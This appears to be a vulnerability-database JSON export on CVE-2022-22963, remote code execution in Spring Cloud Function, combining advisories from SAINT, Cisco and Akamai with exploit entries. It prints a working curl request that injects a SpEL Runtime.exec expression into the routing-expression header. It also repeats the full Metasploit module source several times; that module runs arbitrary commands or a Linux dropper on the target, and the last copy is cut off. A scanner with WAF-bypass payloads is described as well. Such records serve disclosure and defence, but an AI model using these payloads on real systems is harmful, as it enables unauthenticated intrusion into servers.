"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:EA21934BE7986CEF27E73EAA38D7EB58", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T19:35:44", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:ACED9607933F401D5B0A59CB25D22B09", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:11", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n \n\n\nTo run the [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) SpringBoot application run this docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) [exposing](<https://www.kitploit.com/search/label/Exposing> \"exposing\" ) it to port 8080. Example:\n \n \n docker run -it -d -p 8080:8080 bobcheat/springboot-public \n \n\n## Exploit\n\nCurl command:\n \n \n curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/test\")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' \n \n\nOr using [Burp](<https://www.kitploit.com/search/label/Burp> \"Burp\" ) suite:\n\n[](<https://github.com/darryk10/CVE-2022-22963/blob/main/burp-suite-exploit.png> \"$ \\(5\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n## Credits\n\n<https://github.com/hktalent/spring-spel-0day-poc>\n\n \n \n\n\n**[Download CVE-2022-22963](<https://github.com/darryk10/CVE-2022-22963> \"Download CVE-2022-22963\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:30:00", "type": "kitploit", "title": "CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:30:00", "id": "KITPLOIT:7586926896865819908", "href": "http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T21:41:15", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. -p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \">\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. \n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: [http://linkedin.com/in/infosecmazinahmed](<https://linkedin.com/in/infosecmazinahmed> \"http://linkedin.com/in/infosecmazinahmed\" )\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-04-15T15:33:48", "description": "On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed:\n\nCVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22963\"].\n\nCisco's Response to This Vulnerability\n\nCisco accessed all products for impact from CVE-2022-22963. To help detect exploitation of this vulnerability, Cisco has released Snort rules at the following location: Talos Rule SID 59388 [\"https://www.snort.org/rule_docs/1-59388\"]\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-15T15:31:28", "id": "CISCO-SA-JAVA-SPRING-SCF-RCE-DQRHHJXH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-04-01T15:27:32", "description": "Although Spring Cloud Functions are not as widespread as the Log4j library, and should provide a good separation from the hosting server, some draw the line between the two, due to the ease of exploitation over HTTP/s. This new vulnerability will definitely result in many threat actors launching campaigns for crypto-mining, ddos, ransomware, and as a golden ticket to break into organizations for the next years to come.", "cvss3": {}, "published": "2022-03-31T19:30:00", "type": "akamaiblog", "title": "Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T19:30:00", "id": "AKAMAIBLOG:8B6AA3E3035869AEAE3021AB3F1EFE32", "href": "https://www.akamai.com/blog/security/spring-cloud-function", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2022-03-31T17:01:15", "description": "", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "packetstorm", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "PACKETSTORM:166562", "href": "https://packetstormsecurity.com/files/166562/Spring-Cloud-Function-SpEL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Cloud Function SpEL Injection', \n'Description' => %q{ \nSpring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using \nan unsafe evaluation context with user-provided queries. By crafting a request to the application and setting \nthe spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code \nexecution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message. \n}, \n'Author' => [ \n'm09u3r', # vulnerability discovery \n'hktalent', # github PoC \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2022-22963'], \n['URL', 'https://github.com/hktalent/spring-spel-0day-poc'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'], \n['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225'] \n], \n'DisclosureDate' => '2022-03-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 8080, \n'TARGETURI' => '/functionRouter' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']) \n) \n \nreturn CheckCode::Unknown unless res \n \n# both vulnerable and patched servers respond with 500 and a JSON body with these keys \nreturn CheckCode::Safe unless res.code == 500 \nreturn CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set) \n \n# best we can do is detect that the service is running \nCheckCode::Detected \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']), \n'headers' => { \n'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\" \n} \n) \n \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \nfail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166562/spring_cloud_function_spel_injection.rb.txt"}], "metasploit": [{"lastseen": "2022-03-31T19:28:48", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n", "cvss3": {}, "published": "2022-03-30T22:38:41", "type": "metasploit", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T13:01:08", "id": "MSF:EXPLOIT/MULTI/HTTP/SPRING_CLOUD_FUNCTION_SPEL_INJECTION/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_cloud_function_spel_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_cloud_function_spel_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2022-04-06T19:16:05", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "zdt", "title": "Spring Cloud Function SpEL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "1337DAY-ID-37565", "href": "https://0day.today/exploit/description/37565", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error 